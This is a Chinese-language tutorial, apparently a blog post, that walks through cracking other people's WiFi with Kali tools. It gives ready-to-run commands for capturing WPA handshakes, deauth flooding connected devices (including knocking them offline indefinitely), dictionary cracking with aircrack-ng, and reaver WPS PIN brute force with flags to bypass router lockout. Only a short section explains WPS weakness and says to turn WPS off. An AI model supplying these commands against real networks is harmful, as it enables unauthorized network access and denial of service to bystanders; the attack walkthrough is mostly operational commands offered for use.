简单使用Kali WiFi破解实例

---

1.需要一个支持监听模式的网卡

# 先查看一下usb网卡是否连接到虚拟机
# 控制台输入airmon-ng 回车查看网卡是否在监听模式
# 如果显示无线网卡wlan0说明不在监听模式
# 如果该命令没有任何输出则表示网卡是不支持监听模式的。

---

2.开启监听模式

airmon-ng start wlan0 channel_num 	 # 开启监听模式,channel_num信道号2.4G一般范围是1-13不填也没关系
ifconfig #显示wlan0mon表示已在监听模式

airmon-ng stop wlan0 关闭监听模式(抓完包后执行)
-->如果提示某进程影响开启失败 , kill掉该进程重试即可

---

3.搜索附近WiFi

airodump-ng wlan0mon
搜索到目标WiFi后 CTRL+C暂停扫描

搜索结果解析:
BSSID WiFi设备的MAC地址
PWR 信号水平
Beacons 数据的速率
#Date 捕获的数据分组数量
#/S 十秒内的捕获数据分组量
CH 信道号
MB 数据传输速率
ENC 加密类型
CIPHER 加密算法
AUTH 认证协议
ESSID WIFI名称

---

4.抓取握手包

新开一个终端操作:
airodump-ng -w path&&name -c 信道号 --bssid 目标bssid地址 wlan0mon

这条命令的意思是获取这个指定路由的握手码（里面含加密的WiFi密码），获取的数据将输出到当前目录名为path&&name的文件里（-w path&&name储存路径和文件名可以随便改,如果只填name则会在当前目录下生成抓到的cap文件）
参数解释：
-w指定抓取的数据包保存位置
-c指定信道号
-bssid指定路由器bssid
-->当窗口右上角出现WPA handshake时代表已经获取了加密过的密码

---

5.如果第3步抓不到包则需要强迫已连接的设备下线重连:

由此可知aireplay-ng生效的前提是WiFi热点中必须至少已经接入一个设备
开一个新窗口操作:
aireplay-ng -0 反认证包个数 -a  路由器mac地址即BSSID -c 已连接WiFi的其他设备mac wlan0mon

如aireplay-ng -0 2 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon
这条命令是本机冒充成路由器发送请求给已连接路由器的设备让它断线，在设备重连的时候获取握手码（-0参数为用deauth洪水攻击，0为无限次，-0 5则表示攻击5次）攻击原理是：先打掉USR的无线网络连接，消除身份认证, 此时的电脑，PC，手机USR只能手动连接，若无限攻击则USR无法连接上客户端会要求重输密码，这时会有握手包，如不断开攻击，则一直无法连接上。假如攻击2次停止，USR客户端会自动重连，这时亦会自动抓取握手包。

-->抓到握手包后抓取的设备后会显示WiFi名字
-->抓取到后握手包会储存到指定目录
-->反认证包个数如果设置很大,如1000000就会导致已连接的设备无限掉线

---

6.对握手包进行破解(穷举):

aircrack-ng -w /usr/share/sqlmap/txt/wordlist.txt 握手包文件名.cap
或者
aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt~/*.cap
参数解析:
-a2表示wpa握手包
-b表示要破解的WiFi的BSSID
-w 指定字典所在位置
wordlist.txt 为自定义字典
*.cap 为抓取的包

---

pin码破解方法:

pin码破解的前提是路由器开启了WPS功能，首先要做的是发现发现开启WPS功能的wifi。
将网卡切换到监听模式: airmon-ng start
wash -i wlan0mon 扫描开启WPS功能的WiFi,WPS Locked为No的都可以试试

PIN码爆破:

reaver 命令：
reaver -i mon0 -b mac -S -v

reaver命令参数:
    -i 监听后接口名称
    -b 目标mac地址
    -a 自动检测目标AP最佳配置
    -S 使用最小的DH key（可以提高破解速度）
    -vv 显示更多的非严重警告
    -d  即delay每穷举一次的闲置时间 预设为1秒
    -t  即timeout每次穷举等待反馈的最长时间
    -c  指定频道可以方便找到信号，如-c1 指定1频道

示例：　　
　　reaver -i mon0 -b 目标路由器MAC -a -S –d9 –t9 -vv）
　　应因状况调整参数（-c后面都已目标频道为1作为例子）
　　目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
　　目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
　　目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

　　选择之前扫描出来的开启WPS的wifi，选择一个进行破解。


在穷举的过程中，reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。
所以就算一时半会pin不出来的，过段时间pin的时候命令加参数 -s file.wpc，就会根据之前的进度继续pin。


3.注意点：
　　1.一般reaver 前四位默认是从0开始，如果想从指定的数值开始爆破需要添加-p参数：-p 9000,这个意思就是从9000开始，只要不pin死路由器，可以多开几个窗口，从不同的数值开始。
　　2.最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码)，同时如果WPS功能没关，pin码没修改，无论怎样修改密码，都可以通过pin码获取wifi密码: reaver -i mon0 -b mac -p pin码，来再次得到密码
　　3.一般pin的过快，会把路由器pin死，所以一般还会加上-d5 -t5参数，添加5秒延时，当然数值可以自己改。

原理和防范措施:

pin码破解的原理:
pin码是由8位纯数字组成的识别码，pin码破解是分三部分进行的，规律是这样的：pin码分为三部分
前4位为第一部分，第5-7位为第二部分，最后1位为第三部分。第一部分的验证跟第二部分没关联，最后1位是根据第二部分计算得出的校验码。

　　破解一开始是先单独对第一部分进行pin码匹配，也就是说先破解前4位pin码。前4位是0000-9999总共10000个组合。
　　当前4位pin码确定后再对第二部分进行pin码匹配，也就是再对5-7位进行破解，5-7位是000-999总共1000个组合。
　　当前7位都确定后，最后1位也会自动得出，破解完成。
　　根据pin码破解的原理，可以看到只需要枚举11000种情况就会必然破解出pin码，从而通过pin得到wifi密码。

防范措施
1.WPS功能对个人基本上没啥作用，还是关了吧。
2.现在的路由一般会有防pin措施，例如会有300秒pin限制，但这个是伪防pin,作用不是很大。它设置时间间隔，正好防止我们把路由器pin死。所以还是把WPS功能关了，不要过分相信防pin措施，毕竟只有11000种情况，早晚会破解。



如果一直显示
[!] WPS transaction failed (code: 0x03), re-trying last pin
或者
[!] WPS transaction failed (code: 0x02), re-trying last pin
或许是因为对方路由器限定了PIN的次数，PIN得过于频繁就会拒绝探测

可以尝试调整参数设置
reaver -i mon0  -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360

-L 就是忽略路由锁定

-d 60 就是发一次等1分钟，降低我们的探测频率，这相当有用，尽管速度降了下来但是更精准了。

-r 3:15是一个PIN失败后尝试3次，每次间隔15秒。

-T .5 默认是 0.1 ，这是说多久没有收到无线路由的回馈算PIN失败。改大一点可以弥补信号冲突、衰减造成的延迟大的问题。

-x 360 ，当同PIN10次失败后，reaver就进入休眠，时间10分钟，这样可以让路由器恢复一下，利于我们继续PIN！！

#各位想干坏事的小伙伴们请听本人一句劝告, 经本人对附近多个热点进行多次试验得出一个很重要的结论 :                                                                                                                                                       有这种时间和精力去跑包还不如装个宽带省事